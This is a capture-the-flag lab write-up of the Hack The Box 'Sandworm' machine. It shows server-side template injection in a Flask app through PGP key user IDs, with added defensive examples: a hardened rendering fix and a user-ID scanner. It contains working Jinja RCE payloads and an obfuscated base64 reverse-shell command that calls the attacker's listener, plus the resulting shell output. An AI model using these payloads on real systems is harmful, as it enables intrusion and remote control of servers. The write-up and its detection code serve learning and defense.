SSTI


During the PGP testing earlier, I found out that the target web application pops open a new window to display the verification result for a signed message. I also noticed that the newly opened window displays the email address as part of the verification result.

It might be entirely possible to inject a payload into that field and have the web server execute it. However, I first need to confirm the vulnerability and identify the template engine, although it is likely Jinja, since the web app is built on Flask.

There are several test payloads that I can try in order to make the web server execute a mathematical operation.
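Before the probes, a short added illustration of why a payload like {{7*7}} is diagnostic. This is example code written for this page, not code from the write-up or from the target application (whose source is not shown); it assumes Jinja2 is installed, and the two render_signer_banner_* functions are hypothetical stand-ins for the view that displays the verification result. The vulnerable form concatenates the signer's user ID into the template source, so Jinja evaluates whatever expressions the UID contains; the hardened form keeps the template constant and passes the UID as a context variable, so the same text is printed literally.

```python
"""Added example: untrusted OpenPGP user ID rendered as template source (vulnerable)
versus as a context variable (hardened). Requires Jinja2 (assumed installed)."""
from jinja2 import Environment

# Constructed sample UIDs: the write-up's arithmetic probe and a markup probe.
PROBE_UID = "{{7*7}} <{{7*7}}@ssti.ssti>"
MARKUP_UID = "<b>alice</b> <alice@example.invalid>"


def render_signer_banner_vulnerable(uid: str) -> str:
    """Anti-pattern (hypothetical view): the UID becomes part of the TEMPLATE
    SOURCE, so Jinja parses and evaluates any {{ ... }} or {% ... %} inside it."""
    env = Environment()
    template = env.from_string("Signed by " + uid)  # uid is treated as code
    return template.render()


def render_signer_banner_hardened(uid: str) -> str:
    """Fix: the template source is a constant string and the UID is passed as a
    variable, so it is emitted as text. Autoescaping additionally neutralises any
    HTML in the UID before it reaches the browser (braces are left untouched)."""
    env = Environment(autoescape=True)
    template = env.from_string("Signed by {{ uid }}")
    return template.render(uid=uid)


if __name__ == "__main__":
    # The probe is evaluated in the vulnerable view: "Signed by 49 <49@ssti.ssti>"
    print(render_signer_banner_vulnerable(PROBE_UID))
    # ...and printed verbatim (with '<' and '>' escaped) in the hardened one.
    print(render_signer_banner_hardened(PROBE_UID))
    print(render_signer_banner_hardened(MARKUP_UID))
```

In a Flask view this is the difference between `render_template_string(page_html + uid)` and `render_template_string(page_html, uid=uid)`. A `SandboxedEnvironment` limits what an injected expression can reach, but the root cause is attacker text in the template source, and the fix is to keep it out of there.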

┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --gen-key                      
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
 
Note: Use "gpg --full-generate-key" for a full featured key generation dialog.
 
GnuPG needs to construct a user ID to identify your key.
 
Real name: {{7*7}}
Email address: {{7*7}}@ssti.ssti
You selected this USER-ID:
    "{{7*7}} <{{7*7}}@ssti.ssti>"
 
Change (N)ame, (E)mail, or (O)kay/(Q)uit? O
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
gpg: revocation certificate stored as '/home/kali/.gnupg/openpgp-revocs.d/B178DF083B5FBA3FE1B3FEF5426FAA7DE84AD311.rev'
public and secret key created and signed.
 
pub   rsa3072 2023-06-29 [SC] [expires: 2025-06-28]
      B178DF083B5FBA3FE1B3FEF5426FAA7DE84AD311
uid                      {{7*7}} <{{7*7}}@ssti.ssti>
sub   rsa3072 2023-06-29 [E] [expires: 2025-06-28]

There are two fields that I can control: Real name and Email address. The window only showed the email address above because I previously generated the key pair using only the email. So I will test both fields, as the Real name field could also be displayed alongside the Email address. Starting with the first payload: {{7*7}}

┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --export --armor {{7*7}}@ssti.ssti
-----BEGIN PGP PUBLIC KEY BLOCK-----
 
[base64 key data omitted]
=vwni
-----END PGP PUBLIC KEY BLOCK-----

Exporting the public key to provide to the web app

┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ echo "testing ssti" | gpg --armor -s -u {{7*7}}@ssti.ssti
-----BEGIN PGP MESSAGE-----
 
owEB7QES/pANAwAKAUJvqn3oStMRAcsTYgBknTr4dGVzdGluZyBzc3RpCokBxgQA
AQoAMBYhBLF43wg7X7o/4bP+9UJvqn3oStMRBQJknTr4Ehx7ezcqN319QHNzdGku
c3N0aQAKCRBCb6p96ErTERIrDACyYOhzpQ2OkEOTtE9S/okoE8id2VG3KsgCCZpU
woeAoHFrIB8I4g/cGNO05lqya2eBZjKflknemv8mL55677OD+9dVWoxq1+PIorXz
vShemunhMkvBDIOS6jNPWMnOKpdVOWH5SOAMLOYqMx+Jq1yfe0RQ4Oiyq/LnfS7O
1Da638BmSBh7QfiGqDyaeA8V9Nelp64GbHZBJslS69+gvIfeDn4fc0yVE/G7LDrT
tgiEDoJnCCQdYhjbt6+76NVkUO5XJqDkpfyeQhav+Wqt9+Rx5T+FDeR+d0QKmIQD
wZJh9F5Qt8oBM6GJPp5hVS0wo58zRJ0gu2Mlfi9iKEH/cJdUvh15UyVIciqXd8kO
jgqUTs96fbdx9exhFcXApKbJCc3jP8+Dhb2/1BCiXgxQz3TZLlw0rtFFTPJXaJWt
a2sqbxT3hB3T09a8NSJyqdoGaswDreCoxrkcjajSFll73d3H0myBFvm5uCjaTgZn
XqGmPbWiyC6mlQPp1jfFHjDC/6o=
=VI1T
-----END PGP MESSAGE-----

Signing a message

Verifying...

SSTI confirmed in BOTH fields, as the mathematical operation is executed.
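Seen from the defending side, the same property that made both fields injectable (an OpenPGP user ID is free-form, attacker-chosen text) also makes it easy to audit. As an added example, not part of the original write-up or the target application, the script below scans gpg's machine-readable colon output (`gpg --with-colons --list-keys`) and flags user IDs that carry template delimiters or the double-underscore attribute traversal seen in the payloads above. The sample records are constructed from the UIDs and fingerprint shown in this write-up (the key hashes and timestamps in them are made up), and the indicator names are this example's own.

```python
"""Added example: flag OpenPGP user IDs containing template syntax before an
application renders them. Input is gpg colon format; sample is constructed."""
import re
from typing import List, Tuple

# Constructed sample of `gpg --with-colons --list-keys` output. In `uid` and
# `fpr` records field 10 (index 9) holds the user ID / fingerprint; gpg escapes
# ':' inside a user ID as \x3a. Fingerprint and UID of the first key are the
# ones from the write-up; hashes, dates and the second key are made up.
SAMPLE_COLONS = """\
pub:u:3072:1:426FAA7DE84AD311:1688025848:1751011200::u:::scESC::::::23::0:
fpr:::::::::B178DF083B5FBA3FE1B3FEF5426FAA7DE84AD311:
uid:u::::1688025848::ABCDEF0123456789ABCDEF0123456789ABCDEF01::{{7*7}} <{{7*7}}@ssti.ssti>::::::::::0:
pub:u:3072:1:0000000000000001:1688025848:1751011200::u:::scESC::::::23::0:
fpr:::::::::0000000000000000000000000000000000000001:
uid:u::::1688025848::0000000000000000000000000000000000000002::Alice Example <alice@example.invalid>::::::::::0:
"""

# Indicators (names chosen for this example): Jinja expression, statement and
# comment delimiters, the dunder traversal used to reach Python internals, and
# shell-style interpolation that other engines evaluate.
INDICATORS = {
    "jinja_expression": re.compile(r"\{\{.*?\}\}", re.S),
    "jinja_statement": re.compile(r"\{%.*?%\}", re.S),
    "jinja_comment": re.compile(r"\{#.*?#\}", re.S),
    "dunder_traversal": re.compile(r"__[A-Za-z]+__"),
    "dollar_brace": re.compile(r"\$\{.*?\}"),
}


def classify_uid(uid: str) -> List[str]:
    """Return the sorted names of all indicators matched by this user ID."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(uid))


def unescape_colon_field(value: str) -> str:
    """Undo gpg's \\xNN escaping of bytes (notably ':' as \\x3a) in a field."""
    return re.sub(r"\\x([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1), 16)), value)


def scan_colons(text: str) -> List[Tuple[str, str, List[str]]]:
    """Walk gpg colon output and pair each uid with the preceding fingerprint.
    Returns (fingerprint, uid, indicators) for every uid that matches."""
    findings: List[Tuple[str, str, List[str]]] = []
    current_fpr = ""
    for line in text.splitlines():
        fields = line.split(":")
        if fields[0] == "fpr" and len(fields) > 9:
            current_fpr = fields[9]
        elif fields[0] == "uid" and len(fields) > 9:
            uid = unescape_colon_field(fields[9])
            hits = classify_uid(uid)
            if hits:
                findings.append((current_fpr, uid, hits))
    return findings


if __name__ == "__main__":
    for fpr, uid, hits in scan_colons(SAMPLE_COLONS):
        print(f"{fpr}: {uid!r} -> {', '.join(hits)}")
```

Run against the keyring an application imports keys into (`gpg --homedir <app keyring> --with-colons --list-keys | python3 scan.py`, adapting the script to read stdin), this gives a cheap detective control; it does not replace the rendering fix, since a UID is only one of many untrusted strings a template may receive.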

Now that I have confirmed that the target web application is vulnerable to SSTI, I will move on to code execution.

RCE


┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --delete-secret-keys ssti         
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
 
 
sec  rsa3072/426FAA7DE84AD311 2023-06-29 {{7*7}} <{{7*7}}@ssti.ssti>
 
Delete this key from the keyring? (y/N) y
This is a secret key! - really delete? (y/N) y
 
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --delete-key ssti        
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
 
 
pub  rsa3072/426FAA7DE84AD311 2023-06-29 {{7*7}} <{{7*7}}@ssti.ssti>
 
Delete this key from the keyring? (y/N) y

I will first delete the key pair generated for testing, as it is no longer needed.

┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --gen-key                         
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
 
Note: Use "gpg --full-generate-key" for a full featured key generation dialog.
 
GnuPG needs to construct a user ID to identify your key.
 
Real name: {{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("id ; hostname").read() }}
Email address: ssti@ssti.ssti
You selected this USER-ID:
    "{{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("id ; hostname").read() }} <ssti@ssti.ssti>"
 
Change (N)ame, (E)mail, or (O)kay/(Q)uit? O
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
gpg: revocation certificate stored as '/home/kali/.gnupg/openpgp-revocs.d/D0B35312CFCD0D090B9AB857880B1444B6046911.rev'
public and secret key created and signed.
 
pub   rsa3072 2023-06-29 [SC] [expires: 2025-06-28]
      D0B35312CFCD0D090B9AB857880B1444B6046911
uid                      {{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("id ; hostname").read() }} <ssti@ssti.ssti>
sub   rsa3072 2023-06-29 [E] [expires: 2025-06-28]

Generating another key pair with the payload in the Real name field: {{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("id ; hostname").read() }}

┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --export --armor ssti@ssti.ssti   
-----BEGIN PGP PUBLIC KEY BLOCK-----
 
mQGNBGSdPjIBDADSZOXmtZPF2kOBw+zOOzSZZhAz5YZu12BsOEBrv6cDh0hoEohb
OqPTwmt5+x04U1mC19B6o6AMWmBg9m5DmZbtVExz2JXbOLwY0rhTaHMW8l9/Yj2E
RF1q4H0Unm/GcRxxZ29VA5R8XYPDTkwXizmqN2KGmZNXXwjiIY82DLUkbJaP+01O
1oRdMDEx9ZKCC5b7VZq0JrY2MKwoe5jcghQ5d4p+Zj/SO4vEGSXRgtFlycNhreTd
Xze9f3uEnkv66I1sXQhHfNGlw2MTIatPvo5T+S0if/dneaVVnWK73c7/KTxvRNdN
2fQ4J6m5zCxS9LAzQs8LiD2fouudT8cFtnP5+2WMV3CJWOd7uYbPKWS6zRT4JYOO
DuYqImpMDTV84LTVLrMZ1AAjgDJQ3gHuDRH3BOLYgMLrKFzAiqw2Tz5D3uYuxOxf
WEzPcJQnkwqHwsYhEzxeSnrRmEsGwud9Y2gzPVGViwYd4IRh+PKKHuv8nwh1mEVy
+D2WIb8/cRlBl4cAEQEAAbR7e3sgY29uZmlnLl9fY2xhc3NfXy5mcm9tX2VudnZh
ci5fX2dsb2JhbHNfXy5fX2J1aWx0aW5zX18uX19pbXBvcnRfXygib3MiKS5wb3Bl
bigiaWQgOyBob3N0bmFtZSIpLnJlYWQoKSB9fSA8c3N0aUBzc3RpLnNzdGk+iQHU
BBMBCgA+FiEE0LNTEs/NDQkLmrhXiAsURLYEaREFAmSdPjICGwMFCQPCZwAFCwkI
BwIGFQoJCAsCBBYCAwECHgECF4AACgkQiAsURLYEaRFv8wv7ByiPT7qk0Y8OqPEp
O7ARxwKhbhCDkuDF2TBC0Fi+NP3R0PbC0n/lde9uKYTQ9YIB65QlDuQtvhfsb5ok
baulZfaIz0Gvi4W91If3hQMU17QcUOnX/6BaBOY1MCfoK17eOcyD29zGX/CLVcFS
hUNnOVmXdwntQUCjxIyOX5/w5rC5ubZbC0nGKhLc9zTp0xZQRkftZ+gl87Sm2vhu
4AO4j/iH5FEOQUUBwuYiNVf9y5pDzif9ZOCmwmOWozsPubDlm0gYlNYnxSXknjCi
n19LFGoCzObjLJ8JGswBYF2AmYt9wmNjys11INtUzAcp6T4TjEBwG3gxU8nKH0wi
j9QH4E8l7TcIynEtM33gknu8QMPTzcq6AxmS/m+vEudcrbJquiZQSYQdiOJ8ejyZ
iiRvIRsbaALuaa0YLmwA+MO9/Cr93CXynigxJJDtJ40CHzUpidMiL1ASoy0KxZZ3
CPaQf6A9LM6l+75dalvDbNWdXhvk+y48EfWmyTg0yJP3p1PvuQGNBGSdPjIBDAC5
rSfmg9eI8KPW0VhBGLxe53KmyMsaPGO6rDu7ZT9mNE6MLj9wi5J/KoXdwVmsDi+i
HsNCxCq//qdL2e7HBYxEUpFRySVhc2CY4wVZ4gEr3dNXd94hdkIrwa3zXnLVs80/
wQnamlPngehw0rJnfVQH4Nxb/SWUzlCy6zt2XauJHTCCSq+/7WwFUHUjvZwqN6fy
TrnAuG5LDHhzhLsfuuAckBCdf9erN4DqwLwmNTa/NtKb9GnKRu6Kzu65shodZeOz
fkuGSHIxnldzVXKVvr1Lj79zNF2QLmX1Z00bB/4QbYdZzRY9X6cjGOUzIx4qealk
EULNo3rG/TcuE80P5dvwZaROI5lpP9GkVxV1aVe86otLF/WmET36S44/IdeQMoao
RIWy8ittWNv0sccbuJsQKXhgeI767L9IR8wUSvvh3zooaYZiQeja8Swg3uThUDaG
WwDyaX1pvZbjJirMxak/Wei5Wq8lcYiG1zGnpgJ0rrXw4u7wd63UjmznFd6oPyEA
EQEAAYkBvAQYAQoAJhYhBNCzUxLPzQ0JC5q4V4gLFES2BGkRBQJknT4yAhsMBQkD
wmcAAAoJEIgLFES2BGkRzwML/RncLnk3v3HIQGCauq7dogimvA7tyBXPI+iK7sYn
B6IC+WT2RcAgBrH9UVffKGRwJFAFaJsf3QgTCAiDRPXKAtfbT51TCEirfdVLAgkq
25kVLZyviFeWH/95PLjgF++v0zlycuMGXmLWBCVd+uH+tY82Nlj4jyhdGgnA1Jd9
yQ75BcOi9e2Iql6y9haOxTgIP43fWfMH68HZWJZvVWxdnSRS8s3hfEu5hwd4iEQv
SKI2kcNjsLK1Edg4THmSEMWxE5NPLr0xcSfj/NIIN24i+JhFEH3JP0bWDBoemLdy
lVyQYhiJn+mVk1NEh3mki0AUd0kemIS5bAiReahFpM4lRF22j3gGPFUPf0B4cQ9l
hlvoo8nGv/6OAL7xfO/YRmAwyjAKnElRixAbzZyaVhM6PoImS4drxihUsfH3XEAx
8w142q6A1cPq/81gw2lBsnW6jhsL0vn4BtWYaqFRxdwmEoqtyzeDaKRNfmSgF3xE
tfkS1Gj+fUtEYL+GnMj9QS3Avg==
=eHfX
-----END PGP PUBLIC KEY BLOCK-----

Exporting

┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ echo "SSTI" | gpg --armor -s -u ssti@ssti.ssti     
-----BEGIN PGP MESSAGE-----
 
[base64 message data omitted]
=RZ9v
-----END PGP MESSAGE-----

Signing a message

So the web server is running with the privileges of the atlas user. At this point, I can just spawn a reverse shell.

┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --delete-secret-keys ssti         
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
 
 
sec  rsa3072/880B1444B6046911 2023-06-29 {{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("id ; hostname").read() }} <ssti@ssti.ssti>
 
Delete this key from the keyring? (y/N) y
This is a secret key! - really delete? (y/N) y
 
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --delete-key ssti        
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
 
 
pub  rsa3072/880B1444B6046911 2023-06-29 {{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("id ; hostname").read() }} <ssti@ssti.ssti>
 
Delete this key from the keyring? (y/N) y

The old key pair needs to be deleted again.

Foothold


┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --gen-key
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
 
Note: Use "gpg --full-generate-key" for a full featured key generation dialog.
 
GnuPG needs to construct a user ID to identify your key.
 
Real name: {{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("bash -c 'echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40Lzk5OTkgMD4mMQo=|base64 -d|bash'").read() }}
Email address: ssti@ssti.ssti
You selected this USER-ID:
    "{{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("bash -c 'echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40Lzk5OTkgMD4mMQo=|base64 -d|bash'").read() }} <ssti@ssti.ssti>"
 
Change (N)ame, (E)mail, or (O)kay/(Q)uit? O
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
We need to generate a lot of random bytes. It is a good idea to perform
some other action (type on the keyboard, move the mouse, utilize the
disks) during the prime generation; this gives the random number
generator a better chance to gain enough entropy.
gpg: revocation certificate stored as '/home/kali/.gnupg/openpgp-revocs.d/EF96965906B5BD3FF937D00CAFBA40A3F07D1963.rev'
public and secret key created and signed.
 
pub   rsa3072 2023-06-29 [SC] [expires: 2025-06-28]
      EF96965906B5BD3FF937D00CAFBA40A3F07D1963
uid                      {{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("bash -c 'echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40Lzk5OTkgMD4mMQo=|base64 -d|bash'").read() }} <ssti@ssti.ssti>
sub   rsa3072 2023-06-29 [E] [expires: 2025-06-28]

Generating a key pair with the payload in the Real name field: {{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("bash -c 'echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40Lzk5OTkgMD4mMQo=|base64 -d|bash'").read() }}

┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ gpg --export --armor ssti@ssti.ssti
-----BEGIN PGP PUBLIC KEY BLOCK-----
 
[base64 key data omitted]
=voCp
-----END PGP PUBLIC KEY BLOCK-----
 
┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ echo "SSTI" | gpg --armor -s -u ssti@ssti.ssti
-----BEGIN PGP MESSAGE-----
 
owEB4gEd/pANAwAKAa+6QKPwfRljAcsLYgBknUTrU1NUSQqJAcMEAAEKAC0WIQTv
lpZZBrW9P/k30AyvukCj8H0ZYwUCZJ1E6w8cc3N0aUBzc3RpLnNzdGkACgkQr7pA
o/B9GWO+UQv/RIgls6uOcN9OnzJm+Go5ijcYiozD0CnH77KEjFd5Vi9TqBdAPl8Q
3fg5w3GWxn5ayGP6Lywbk+hWVNcENIr29bCopQRyA1pW0R+afBV8PHAfJVc2Fa3m
8S/Nk9LP3ZoBc3QC9Hx+Su1aUOPTMJ4mKZ48yCntVwTc03NpZBAVKTFE1A7fPJ11
8KMR9R4iRayT1DZvMU3i7BCEk3MX9JwTzG7jBgDTKfdvd9Ux6xZuTj3wq/D8L32p
beZsWqqlWXZ7EWY/PMjiqXVvQIDAyQ5fuPtWW4q0IaU56ggOA7k0tiBfNBZ4VH3b
6gEozarpQ1CmzbcdawbiTLnJ7gXaStYqiwHi5ZNkefA7GgOL7ieWSHiAO5LJKEaU
6hJIXnsmOUPYQ9KkxM/MbQMBtO7kbqRB7Xx9xr33BV26lmP4fS5hU84Z09X8hM/T
jY3EdJrVBKXXSVhLSda0QjTz6UV7a3qCBGmeP9pTdMX0RKGGwiCUIgCPpoEtTrn/
xCGS+LDtkFcT
=+q+m
-----END PGP MESSAGE-----

Exporting the key and signing a message

Sent

┌──(kali㉿kali)-[~/archive/htb/labs/sandworm]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.218] 52490
/bin/sh: 0: can't access tty; job control turned off
$ whoami
/bin/sh: 1: whoami: not found
$ id
uid=1000(atlas) gid=1000(atlas) groups=1000(atlas)
$ hostname
/bin/sh: 3: hostname: not found
$ ip a
/bin/sh: 4: ip: not found
$ ifconfig
/bin/sh: 5: ifconfig: not found
$ uname -r
/bin/sh: 6: uname: not found
$ ls
SSA
$ pwd
/var/www/html/SSA

I got a shell session open, but it seems that I am in a restricted environment. Initial foothold established on the target system as the atlas user via SSTI to RCE.